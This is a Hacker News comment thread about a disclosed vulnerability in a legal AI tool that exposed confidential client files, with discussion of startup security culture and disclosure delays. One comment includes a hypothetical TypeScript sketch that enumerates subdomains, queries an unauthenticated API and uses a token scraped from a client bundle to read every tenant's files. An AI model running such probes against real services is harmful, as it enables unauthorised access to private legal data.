Reverse engineering a $1B Legal AI tool exposed 100k+ confidential files

alexschapiro.com

228 points by bearsyankees 2 hours ago


quapster - 2 hours ago

This is the collision between two cultures that were never meant to share the same data: "move fast and duct-tape APIs together" startup engineering, and "if this leaks we ruin people's lives" legal/medical confidentiality.

What's wild is that nothing here is exotic: subdomain enumeration, unauthenticated API, over-privileged token, minified JS leaking internals. This is a 2010-level bug pattern wrapped in 2025 AI hype. The only truly "AI" part is that centralizing all documents for model training drastically raises the blast radius when you screw up.
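
To make it concrete, the entire class fits in a few lines. A hypothetical sketch (the hostnames, routes, and token below are invented for illustration; nothing here is taken from the actual writeup):

    // Hypothetical sketch of the 2010-era bug class described above.
    async function probe(): Promise<void> {
      // Step 1: subdomain enumeration over a small candidate list.
      for (const sub of ["api", "staging", "internal"]) {
        const base = `https://${sub}.example-legal-ai.com`;
        // Step 2: unauthenticated API -- no Authorization header at all.
        const res = await fetch(`${base}/v1/documents?limit=10`);
        if (res.ok) console.log(`open endpoint: ${base}`, await res.json());
      }
      // Step 3: an over-privileged token scraped from the minified client
      // bundle. If it isn't scoped per tenant, it reads every firm's files.
      const leakedToken = "sk_live_EXAMPLE"; // placeholder, not a real secret
      const all = await fetch("https://api.example-legal-ai.com/v1/files", {
        headers: { Authorization: `Bearer ${leakedToken}` },
      });
      console.log(all.status); // 200 here is the whole blast radius
    }

    probe().catch(console.error);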

The economic incentive is obvious: if your pitch deck is "we'll ingest everything your firm has ever touched and make it searchable/AI-ready", you win deals by saying yes to data access and integrations, not by saying no. Least privilege, token scoping, and proper isolation are friction in the sales process, so they get bolted on later, if at all.

The scary bit is that lawyers are being sold an "AI assistant", but what they're actually buying is "unvetted third-party root access to your institutional memory". At that point, the interesting question isn't whether there are more bugs like this; it's how many of these systems would survive a serious red-team exercise by anyone more motivated than a curious blogger.

mattfrommars - 7 minutes ago

This might be off topic, even though we're discussing an AI tool and this is Hacker News.

I've been pondering for a long time how one builds a startup in a domain they're not familiar with, but ... I just have this urge to carve out a piece of the pie in this space. For the longest time, I had this dream of starting or building an 'AI legal tech company' -- the big issue is, I don't work in the legal space at all. I did some cold outreach on law-firm-related forums, which didn't gain any traction.

I later searched around and came across the term 'case management software'. From what I know, this is fundamentally what Clio is, and it makes millions if not billions.

This was 1.5 to two years ago, and since then I've stopped thinking about it because of this belief I hold: "how can I do a startup in legal when I don't work in this domain?" But when I look around, I see people starting companies in totally unrelated industries -- from dental tech companies to Hugging Face, whose founders, if I'm not mistaken, don't have PhDs in AI/ML.

Given all that, how does one start a company in an unrelated domain? Say I want to build another case management system or attempt to clone FileVine: do I first read up on what case management software is, or do I cold-email potential law firms that would partner up to build a SaaS from scratch? Another school of thought goes, "find customers before you have a product, to validate what you want to build" -- how does that realistically work?

Apologies for the scattered thoughts...

icyfox - 2 hours ago

I'm always a bit surprised how long it can take to triage and fix these pretty glaring security vulnerabilities. A disclosure on October 27, 2025 and an email confirmation only on November 4, 2025 seems like a long time to leave an entire client file system exposed. Sure, the actual bug was probably (what I imagine to be) a <1 hr fix, plus the time for QA testing to make sure the fix didn't break anything.

Is the issue that people aren't checking their security@ email addresses? That people are on holiday? That these inboxes get so much spam it's really hard to separate the legit signal from the noise? I'm genuinely curious.

fallinditch - 3 minutes ago

> ... after looking through minified code, which SUCKS to do ...

AI tends to be good at un-minifying code.
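
For example, a bundle one-liner like this (invented for illustration, not from the actual app):

    const f=async(i)=>(await fetch(`/api/docs/${i}`)).json();

typically comes back from an LLM as something readable, with names and structure restored:

    // Fetch a single document by id from a (hypothetical) docs API.
    const fetchDocumentById = async (documentId: string) => {
      const response = await fetch(`/api/docs/${documentId}`);
      return response.json();
    };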

sys32768 - an hour ago

I work for a finance firm and everyone is wondering why we can store reams of client data with SaaS Company X, but not upload a trust document or tax return to AI SaaS Company Y.

My argument is that we're in the Wild West with AI: this stuff is being built so fast, with so many evolving tools, that corners are being cut even when teams don't realize it.

This article demonstrates that, but it does raise the question of why we should trust one and not the other when they both promise the same safeguards.

canopi - 2 hours ago

The first thing that comes to my mind is SOC 2, HIPAA, and the whole security theater around them.

I am one of the engineers who had to suffer through countless screenshots and forms to get these certifications, because they show that you are "compliant and safe", while the genuinely impactful things are ignored.

valbaca - 14 minutes ago

Given the absurd number of startups I see lately with the words "healthcare" and "AI" in them, I'm actually incredibly concerned that in just a couple of months we're going to have multiple enormous HIPAA data disasters.

Just search "healthcare" in https://news.ycombinator.com/item?id=46108941

kylecazar - 2 hours ago

If they have a billion-dollar valuation, this fairly basic (and irresponsible) vulnerability could have cost them a billion dollars. If someone with malice had been in your shoes, in that industry, this probably wouldn't have been recoverable. Imagine a firm's entire client communications and discovery posted online.

They should have given you some money.

yieldcrv - 3 minutes ago

I've worked in several "agentic" roles this year alone (I'm very poachable lol)

and otherwise well-structured engineering orgs have lost their goddamn minds with "move fast and break things"

because they're worried that OpenAI/Google/Meta/Amazon/Anthropic will release the tool they're working on tomorrow

literally all of them are like this

richwater - 24 minutes ago

Of course there will be no accountability or punishment.

jacquesm - 2 hours ago

That doesn't surprise me one bit. Just think about all the confidential information that people paste into their ChatGPT and Claude sessions. You could probably keep the legal system busy for the next century on a couple of days of that.

lupire - 23 minutes ago

Who is Margolis, and are they happy that OP publicly announced accessing all their confidential files?

Clever work by OP. Surely there's some automated probing tool out there that has already hit this product?

Invictus0 - 2 hours ago

This guy didn't even get paid for this? We need a law that establishes mandatory payments for cybersecurity bounty hunters.

imvetri - an hour ago

Legal attacks engineering: font license fees imposed on Japanese consumers. Engineering attacks legal: the AI info dump in the post above.

How does the above sound, and what kind of professional writes like that?

chunk1000 - 2 hours ago

Thank you bearsyankees for keeping us informed.

observationist - 2 hours ago

I think this class of problems can be protected against.

It's become clear that the first, most important, and most valuable agent (or team of agents) to build is the one that responsibly and diligently lays out the opsec framework for whatever other system you're trying to automate.

A meta-security AI framework -- a Cursor for opsec -- would be the best, most valuable general-purpose AI tool any company could build, imo. Everything from journalism to law to coding would immediately benefit, and it'd provide invaluable data for post-training, reducing the overall problematic behaviors in the underlying models.

"Move fast and break things" is a lot more viable if you have a red-team mechanism that scales with the product. Who knows how many facepalm-level failures like this are out there?